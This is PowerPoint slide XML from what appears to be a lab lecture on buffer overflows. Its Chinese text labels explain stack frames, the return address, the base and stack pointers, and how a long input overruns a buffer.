                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654461" y="4679213"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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2" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3DEA90-648D-2C42-B38C-CA7C75F433B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654460" y="4191019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Return</a:t>
            </a:r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Address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F69AEB2-2022-BB4C-A34B-411A730B8DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3514385" y="5415313"/>
            <a:ext cx="2532888" cy="8757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B8C736B-1F9F-B347-94C6-D3BBBAA8D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3676979" y="5415313"/>
            <a:ext cx="21064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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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EA517597-4BDE-034A-A592-3BDA66B47613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5783466" y="5572674"/>
            <a:ext cx="1929388" cy="1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正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C010FA-E058-CB49-BAD0-07FBCD4C4076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9931023" y="4421830"/>
            <a:ext cx="2384437" cy="916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14" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{600F4C94-7AF7-4045-8DC2-AF3E06899A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9506915" y="4675086"/>
            <a:ext cx="638710" cy="12838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テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF892013-7C7E-0C43-A0A8-94225EBFB897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10054482" y="4445419"/>
            <a:ext cx="21375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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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3" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5B4787-A784-7844-A84E-D03C36D8B95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236043" y="4637196"/>
            <a:ext cx="3571519" cy="39547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EFECCC1-8CAC-B148-BAB4-58A55C64A1DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358957" y="4875239"/>
            <a:ext cx="3176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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>回到主程式 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>retrun</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ret :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>eip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下一個指令位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="直線矢印コネクタ 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3630A90-DC03-AF4B-BD68-D898F60A1E1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2384438" y="4445420"/>
            <a:ext cx="5146563" cy="609063"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A70B54-BA37-45D6-8D18-927179B6C335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="3796442"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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A3D227BF-2839-41AC-B482-195B99F8AF10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3942023"/>
            <a:ext cx="680313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908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FA9C07A6-B4F1-714D-B684-DCF8CA48C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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569112" y="1661975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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780930" y="1600610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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654461" y="4679213"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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F69AEB2-2022-BB4C-A34B-411A730B8DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3514385" y="5415313"/>
            <a:ext cx="2532888" cy="8757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B8C736B-1F9F-B347-94C6-D3BBBAA8D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3676979" y="5415313"/>
            <a:ext cx="21064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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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EA517597-4BDE-034A-A592-3BDA66B47613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5783466" y="5572674"/>
            <a:ext cx="1929388" cy="1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正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C010FA-E058-CB49-BAD0-07FBCD4C4076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9931023" y="4421830"/>
            <a:ext cx="2384437" cy="916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14" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{600F4C94-7AF7-4045-8DC2-AF3E06899A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9506915" y="4675086"/>
            <a:ext cx="638710" cy="12838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テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF892013-7C7E-0C43-A0A8-94225EBFB897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10054482" y="4445419"/>
            <a:ext cx="21375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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F2267D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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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3" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5B4787-A784-7844-A84E-D03C36D8B95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236043" y="4609276"/>
            <a:ext cx="3571519" cy="39547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EFECCC1-8CAC-B148-BAB4-58A55C64A1DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358957" y="4875239"/>
            <a:ext cx="317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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>回到主程式 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>結束</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A70B54-BA37-45D6-8D18-927179B6C335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="1220764"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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A3D227BF-2839-41AC-B482-195B99F8AF10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1366345"/>
            <a:ext cx="680313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5355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9B86CD-41E4-834F-880B-6A9E4C66A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Lab3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>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82F6D24-41D8-1249-814D-10DB20A6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479" y="1521866"/>
            <a:ext cx="5596921" cy="472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142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0D95E-211E-6440-8CF1-603025417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kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>overflow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B6E170-B89F-C94F-BF1C-C22157707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768" y="2159331"/>
            <a:ext cx="5176944" cy="1522653"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>今天有個</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>使用者輸入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 範圍超過</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>實質變數分配</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{703D1263-F0DB-F943-B06A-60E37C3A3D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694803" y="1998135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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26E92B7D-5701-B847-B1FD-E1F227DA1B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7906621" y="1936770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" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F64CA201-D4BE-8245-B626-BFBCC17116CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780152" y="5015373"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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8" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4BD28D9-D3A9-EF44-988A-FB8E8E24133B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780151" y="4527179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Return</a:t>
            </a:r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Address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0" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FC45EDD-CE0E-4B4E-9D28-65E45935F672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780150" y="3573913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Char</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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tmp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05D2C72-4499-1544-B871-EBA2F4BF6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59331"/>
            <a:ext cx="4013129" cy="1425117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F33ADE2-63DB-FC4E-84B7-7ACEABDC8CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780150" y="4050546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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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95006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0D95E-211E-6440-8CF1-603025417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kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>overflow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B6E170-B89F-C94F-BF1C-C22157707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943527"/>
            <a:ext cx="5176944" cy="1522653"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>當使用者輸入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{703D1263-F0DB-F943-B06A-60E37C3A3D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694803" y="1998135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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26E92B7D-5701-B847-B1FD-E1F227DA1B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7906621" y="1936770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" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F64CA201-D4BE-8245-B626-BFBCC17116CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780152" y="5015373"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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8" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4BD28D9-D3A9-EF44-988A-FB8E8E24133B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780151" y="4527179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Return</a:t>
            </a:r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Address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05D2C72-4499-1544-B871-EBA2F4BF6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59331"/>
